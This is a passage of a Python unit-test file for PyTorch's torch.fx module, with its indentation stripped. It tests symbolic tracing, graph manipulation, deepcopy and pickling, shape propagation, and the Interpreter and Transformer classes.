def test_deepcopy_graphmodule_with_transform(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
def transform(traced):
new_graph = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_value = new_graph.graph_copy(traced.graph, val_map)
relu_out = new_graph.create_node(
op='call_method', target='neg', args=(output_value,), kwargs={})
new_graph.output(relu_out)
return GraphModule(traced, new_graph)
transformed = transform(traced)
transformed.graph.lint()
copied = copy.deepcopy(transformed)
self.assertNotEqual(id(type(transformed)), id(type(copied)))
x = torch.randn(3, 4)
self.assertEqual(copied(x), transformed(x))
def test_deepcopy_with_submods_params(self):
class Bar(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
def forward(self, x):
return torch.relu(x) + self.param
class Baz(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.bar = Bar()
def forward(self, x):
return self.bar(x) - self.param
baz = Baz()
traced = symbolic_trace(baz)
traced.graph.lint()
copied = copy.deepcopy(traced)
copied.graph.lint()
def test_unpack_list_better_error(self):
class SomeArgs(torch.nn.Module):
def forward(self, a, b):
return torch.rand(3, 4)
class UnpacksList(torch.nn.Module):
def __init__(self):
super().__init__()
self.sa = SomeArgs()
def forward(self, x : list):
return self.sa(*x)
ul = UnpacksList()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ul)
def test_unpack_dict_better_error(self):
class SomeKwargs(torch.nn.Module):
def forward(self, x=3, y=4):
return torch.rand(3, 4)
class UnpacksDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.sk = SomeKwargs()
def forward(self, x : dict):
return self.sk(**x)
ud = UnpacksDict()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ud)
def test_pretty_print_targets(self):
# Test that Graph pretty-print prints friendly name for targets
# in `operator` and `builtins`
class SomeMod(torch.nn.Module):
def forward(self, x):
return torch.add(x.foo + x.bar, 3.0)
traced = symbolic_trace(SomeMod())
graph_str = str(traced.graph)
self.assertIn('builtins.getattr', graph_str)
self.assertIn('operator.add', graph_str)
self.assertIn('torch.add', graph_str)
def test_pretty_print_node(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.param: torch.nn.Parameter = torch.nn.Parameter(
torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x: torch.Tensor, y: int = 2):
return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0)
traced = symbolic_trace(M())
all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes])
FileCheck().check("x").check("placeholder") \
.check("y").check("placeholder") \
.check("getitem").check("call_function") \
.check("param").check("get_attr") \
.check("add").check("call_function") \
.check("linear").check("call_module") \
.check("clamp").check("call_method") \
.run(all_formatted)
def test_script_tensor_constant(self):
# TorchScript seems to ignore attributes that start with `__`.
# We used to call anonymous Tensor values `__tensor_constant*`, but
# they were getting ignored by script. Now they're called
# `_tensor_constant*`
class IHaveATensorConstant(torch.nn.Module):
def forward(self, x):
return x + torch.rand(3, 4)
traced = torch.fx.symbolic_trace(IHaveATensorConstant())
torch.jit.script(traced)
def test_torch_fx_len(self):
class FXLenTest(torch.nn.Module):
def forward(self, x):
return len(x)
traced = symbolic_trace(FXLenTest())
self.assertEqual(traced(torch.rand(3, 4)), 3)
# Test scriptability
scripted = torch.jit.script(FXLenTest())
self.assertEqual(scripted(torch.rand(3)), 3)
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(3)), 3)
# Test non-proxy len
class FXLenTest2(torch.nn.Module):
def __init__(self):
super().__init__()
self.l = [3, 4, 5]
def forward(self, x):
return x + len(self.l)
traced2 = symbolic_trace(FXLenTest2())
inp = torch.rand(3, 4)
self.assertEqual(traced2(inp), inp + 3.0)
self.assertIs(len, builtins.len)
def test_sqrt(self):
class Sqrt1(torch.nn.Module):
def forward(self, x):
return sqrt(x.size(0))
class Sqrt2(torch.nn.Module):
def forward(self, x):
return math.sqrt(x.size(0))
class Sqrt3(torch.nn.Module):
def forward(self, x):
return x + math.sqrt(2) + sqrt(2)
self.checkGraphModule(Sqrt1(), [torch.zeros(8)])
self.checkGraphModule(Sqrt2(), [torch.zeros(8)])
self.checkGraphModule(Sqrt3(), [torch.zeros(8)])
self.assertIs(sqrt, _sqrt)
self.assertIs(math.sqrt, _sqrt)
def test_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
def test_pickle_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
self.assertEqual(loaded(input), gm(input))
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
printed = str(traced)
assert 'SimpleTest()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint()
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
def test_custom_proxy_type(self):
class TensorPair:
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair(x : TensorPair, y : TensorPair):
s = x.add(y)
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair(x, y)
traced = symbolic_trace(use_tensor_pair)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_type_literal(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_literal(x : TensorPair):
s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3)))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair_literal(x)
traced = symbolic_trace(use_tensor_pair_literal)
traced_out = traced(x)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_dynamic_value(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor):
s = x.add(TensorPair(y, y))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = torch.randn(5, 3)
ref_out = use_tensor_pair_ctor(x, y)
traced = symbolic_trace(use_tensor_pair_ctor)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_input_dependent_control_flow(self):
class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, inp):
if inp.sum() == 0:
self.is_zero = True
self.tensor = torch.tensor([])
else:
self.is_zero = False
self.tensor = inp
def add(self, other):
if self.is_zero:
return ZeroTensor(other.tensor)
elif other.is_zero:
return self
def use_zero_tensor(x : torch.Tensor, y : torch.Tensor):
return ZeroTensor(x + y)
x, y = torch.randn(5, 3), torch.randn(5, 3)
ref_out = use_zero_tensor(x, y)
traced = symbolic_trace(use_zero_tensor)
traced_out = traced(x, y)
self.assertEqual(traced_out.is_zero, ref_out.is_zero)
self.assertEqual(traced_out.tensor, ref_out.tensor)
def test_graph_fns(self):
g = Graph()
a = g.placeholder('a')
b = g.call_module('linear', (a,))
c = g.get_attr('bias')
d = g.call_method('add', (b, c))
e = g.call_function(torch.sin, (d,))
g.output(e)
mod = torch.nn.Module()
mod.linear = torch.nn.Linear(3, 4)
mod.bias = torch.rand(4)
gm = GraphModule(mod, g)
gm.graph.lint()
input = torch.rand(3)
r = gm(input)
ref = torch.sin(mod.linear(input) + mod.bias)
self.assertEqual(r, ref)
def test_remove_uses(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu)
g.erase_node(neg)
self.assertTrue(neg not in relu.users)
def test_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(3, 4)
symbolic_trace(eb)
def test_pickle_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(10, 3, mode='sum')
traced = symbolic_trace(eb)
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
self.assertEqual(loaded(input, offsets), traced(input, offsets))
def test_return_tuple(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
return (x, x + x)
original = M()
traced = symbolic_trace(original)
self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1)))
def test_construct_root_dict(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
add_param : torch.Tensor = torch.rand(3, 4)
gm : torch.fx.GraphModule = torch.fx.GraphModule(
{'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
gm.graph.lint()
assert 'self.foo.bar.baz' in gm.code
x : torch.Tensor = torch.rand(3, 3)
out : torch.Tensor = gm(x)
ref_out : torch.Tensor = linear_mod(x) + add_param
self.assertEqual(out, ref_out)
def test_symbolic_trace_assert(self):
class AssertsTensorShape(torch.nn.Module):
def forward(self, x):
torch._assert(x.shape[1] > 4, "assert_foobar")
return x
m = AssertsTensorShape()
# verify traceability
traced = symbolic_trace(m)
# verify assertion on traced model works correctly at runtime
traced(torch.rand(4, 5))
with self.assertRaisesRegex(AssertionError, "assert_foobar"):
traced(torch.rand(4, 3))
# verify the symbolically traced module is scriptable
ms = torch.jit.script(m)
with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"):
ms(torch.rand(4, 3))
def test_trace_fn_constant(self):
some_constant = torch.rand(3, 4)
def add_const(x):
return some_constant + x
traced = symbolic_trace(add_const)
input = torch.rand(3, 4)
self.assertEqual(traced(input), add_const(input))
def test_copy_no_remap(self):
traced = symbolic_trace(SimpleTest())
g = traced.graph
copied = torch.fx.Graph()
for node in g.nodes:
copied.node_copy(node)
with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
copied.lint()
def test_wrong_topo(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
nodes = list(graph.nodes)
nodes[3].append(nodes[2])
with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
graph.lint()
def test_example_shape_prop(self):
class TestCase(torch.nn.Module):
def __init__(self):
super().__init__()
self.attr = torch.randn(3, 4)
self.submod = torch.nn.Linear(4, 4)
def forward(self, x):
return torch.neg(self.submod(x.relu() + self.attr))
tc = TestCase()
tc_traced = symbolic_trace(tc)
ref_out = tc_traced(torch.rand(3, 4))
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
# Make sure we're testing all opcodes
opcodes = set()
output_shape : Optional[torch.Shape] = None
output_stride : Optional[Tuple[int]] = None
for node in tc_traced.graph.nodes:
opcodes.add(node.op)
if node.op == 'output':
output_shape = node.args[0].meta['tensor_meta'].shape
output_stride = node.args[0].meta['tensor_meta'].stride
self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
'call_module', 'output']))
# Test shape propogation and make sure results match actual
self.assertEqual(output_shape, ref_out.shape)
self.assertEqual(output_stride, ref_out.stride())
def test_shape_prop_layout(self):
class ConvTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv2d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
# contiguous layout
test_mod = ConvTest()
traced = symbolic_trace(test_mod)
x = torch.randn(5, 5, 224, 224)
shape_prop.ShapeProp(traced).propagate(x)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced.graph.nodes))
x_channels_last = x.contiguous(memory_format=torch.channels_last)
traced.to(memory_format=torch.channels_last)
shape_prop.ShapeProp(traced).propagate(x_channels_last)
for node in traced.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last)
def test_shape_prop_aggregate(self):
class ReturnTwo(torch.nn.Module):
def forward(self, x):
return (3, torch.sum(x))
class UnderTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.rt = ReturnTwo()
def forward(self, x):
return self.rt(x)
ut = UnderTest()
class RTTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is ReturnTwo
graph = RTTracer().trace(ut)
mod = torch.fx.GraphModule(ut, graph)
shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4))
for node in mod.graph.nodes:
if node.op == 'call_module':
assert 'tensor_meta' in node.meta
tensor_meta = node.meta['tensor_meta']
assert tensor_meta[0] == 3
assert tensor_meta[1].shape == torch.Size([])
def test_shape_prop_layout_3d(self):
class ConvTest3d(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv3d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
test_mod_3d = ConvTest3d()
traced_3d = symbolic_trace(test_mod_3d)
x_3d = torch.randn(5, 5, 224, 224, 15)
shape_prop.ShapeProp(traced_3d).propagate(x_3d)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced_3d.graph.nodes))
x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d)
traced_3d.to(memory_format=torch.channels_last_3d)
shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d)
for node in traced_3d.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d)
def test_interpreter(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
interpreter = Interpreter(gm)
input = torch.randn(3, 4)
self.assertEqual(interpreter.run(input), gm(input))
self.assertEqual(interpreter.run(input), m(input))
def test_interpreter_run_node_override(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
class RunNodeInterpreter(Interpreter):
def __init__(self, module):
super().__init__(module)
def run_node(self, n : Node) -> Any:
result = super().run_node(n)
n.cached_value = result
return result
input = torch.randn(3, 4)
RunNodeInterpreter(gm).run(input)
for node in gm.graph.nodes:
assert hasattr(node, 'cached_value')
def test_interpreter_onthefly_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
self.assertEqual(result, torch.neg(input).sigmoid())
def test_interpreter_partial_eval(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
gm = torch.fx.symbolic_trace(MyModule())
interp = Interpreter(gm)
env = {}
for node in gm.graph.nodes:
if node.op == 'call_module' and node.target == 'linear':
env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0
break
assert len(env) == 1
x = torch.randn(3, 4)
result = interp.run(x, initial_env=env)
self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0))
def test_interpreter_star_args(self):
def with_star_args(x, *args):
return x + args[0]
gm = torch.fx.symbolic_trace(with_star_args)
interp = Interpreter(gm)
result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4))
self.assertEqual(result, torch.ones(3, 4) * 2.0)
@skipIfNoTorchVision
def test_interpreter_noop_resnet18(self):
rn18 = torchvision_models.resnet18()
transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform()
inp = torch.randn(5, 3, 224, 224)
self.assertEqual(transformed(inp), rn18(inp))
@skipIfNoTorchVision
def test_interpreter_gc_values(self):
rn18 = torchvision_models.resnet18()
interp = Interpreter(symbolic_trace(rn18))
inp = torch.rand(5, 3, 224, 224)
out = interp.run(inp)
env_key_names = set(n.name for n in interp.env.keys())
self.assertEqual(env_key_names, set(['output']))
def test_transformer_noop(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_transformer_op_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapXformer(Transformer):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
transformed = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(transformed(input), torch.neg(input).sigmoid())
def test_transformer_multi_outputs(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
x = x + self.param
out = self.linear(x)
return x, out
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_fn_type_annotations(self):
class Foo(torch.nn.Module):
def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
return {'a': p.x + p.y + z + i}
foo_scripted = torch.jit.script(Foo())
foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
fxed = symbolic_trace(Foo())
fxed_scripted = torch.jit.script(fxed)
fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
def test_fn_type_annotation_empty(self):
def forward(a : List[torch.Tensor]):
return a[0]
torch.jit.script(symbolic_trace(forward))
def test_wrapped_method(self):
def wrap_with_relu(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return torch.relu(fn(*args, **kwargs))
return wrapper
class Foo(torch.nn.Module):
@wrap_with_relu
def forward(self, x, w):
return torch.matmul(x, w)
f = Foo()
traced = symbolic_trace(f)
x, w = torch.rand(3, 4), torch.rand(4, 4)
self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes))
def test_empty_graph_codegen(self):
graph = torch.fx.Graph()
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(gm(), None)
def test_sequential(self):
m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1))
gm = torch.fx.symbolic_trace(m)
gm_copy = copy.deepcopy(gm)
def test_ctx_mgr(self):
@contextlib.contextmanager
def do_nothing():
yield
class M(torch.nn.Module):
def __init__(self):
super().__init__()
@do_nothing()
def forward(self, x):
return torch.relu(x)
m = M()
self.checkGraphModule(m, (torch.rand(3, 4),))
def test_typename_print(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
type_expr=List[float])
output : torch.fx.Node = graph.output(b)
self.assertTrue('typing.List[float]' in str(graph))
def test_ellipsis(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
return x + y[:, 1:10, ...]
traced = symbolic_trace(M())
x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4)
self.assertEqual(traced(x, y), x + y[:, 1:10, ...])
def test_inf_nan(self):
class FooMod(torch.nn.Module):
def forward(self, x):
return x + float('inf'), x + float('-inf'), x + float('nan')
fm = FooMod()
self.checkGraphModule(fm, (torch.rand(3, 4),))
def test_inf_nan_kwds(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf')
c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan')
graph.output((b, c))
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
x = torch.rand(3, 4)
self.assertEqual(gm(x), (x + float('inf'), x + float('nan')))
def test_deepcopy_recursion_depth(self):
depth = sys.getrecursionlimit() + 20
g = torch.fx.Graph()
x = g.placeholder('x')
for i in range(depth):
x = g.call_function(torch.relu, (x,))
g.output(x)
copied_graph = copy.deepcopy(g)
val_map = {}
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
val_map[orig_node] = new_node
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
orig_users = set(orig_node.users.keys())
orig_users_equiv = set(val_map[u] for u in orig_users)
new_users = set(new_node.users.keys())
self.assertEqual(orig_users_equiv, new_users)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = torchvision_models.resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs.copy()
# Neg doesn't have in-place
kwargs.pop('inplace')
with rn18_traced.graph.inserting_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=node.kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
def test_replace_input(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.replace_input_with(x, y)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input_x = torch.randn(33, 44)
input_y = torch.randn(11, 22)
self.assertEqual(gm(input_x, input_y), torch.relu(input_y))
def test_insertion_point(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
with graph.inserting_before(b):
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_update_args_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_arg(0, y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_update_kwargs_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x})
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_kwarg('input', y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_move_before(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
b.prepend(neg)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_erase_node_error(self):
st = SimpleTest()
traced = symbolic_trace(st)
for node in traced.graph.nodes:
# Test deleting with uses both in another Node and at the output
if node.target in [operator.add, torch.relu]:
with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
traced.graph.erase_node(node)
def test_copy_it(self):
d = immutable_dict([(3, 4), (5, 6)])
l = immutable_list([(3, 4), (5, 6)])
self.assertEqual(d, deepcopy(d))
self.assertEqual(l, deepcopy(l))
def test_get_torch_func_signature(self):
for key in dir(torch):
obj = getattr(torch, key)
if callable(obj):
schemas = get_signature_for_torch_op(obj)
def test_find_uses(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
y = torch.relu(x)
z = x + x
u = torch.neg(x)
graph.output((y + z + u).node)
graph.lint()
users_of_x = x.node.users
self.assertEqual(len(users_of_x), 3)
expected_ops = set(['relu', 'add', 'neg'])
for use in users_of_x:
assert any(use.name.startswith(prefix) for prefix in expected_ops)
def test_inline_graph(self):
class InlineInto(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class ToInline(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
inline_into = symbolic_trace(InlineInto())
to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = list(to_inline.graph.nodes)[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with graph.inserting_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
def test_reassign_args_kwargs_uses(self):
graph = torch.fx.Graph()
x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
z = x + y
zed = z + z + z
graph.output(zed.node)
graph.lint()
# zed = z + z + z -> zed = z + z + x
zed.node.args = (zed.node.args[0], x.node)
self.assertEqual(x.node.users.keys(), [z.node, zed.node])
# z = x + y -> z = y + y
z.node.args = (y.node, y.node)
self.assertEqual(x.node.users.keys(), [zed.node])
def test_trace_function(self):
def foo(x, y):
return torch.relu(x) + y
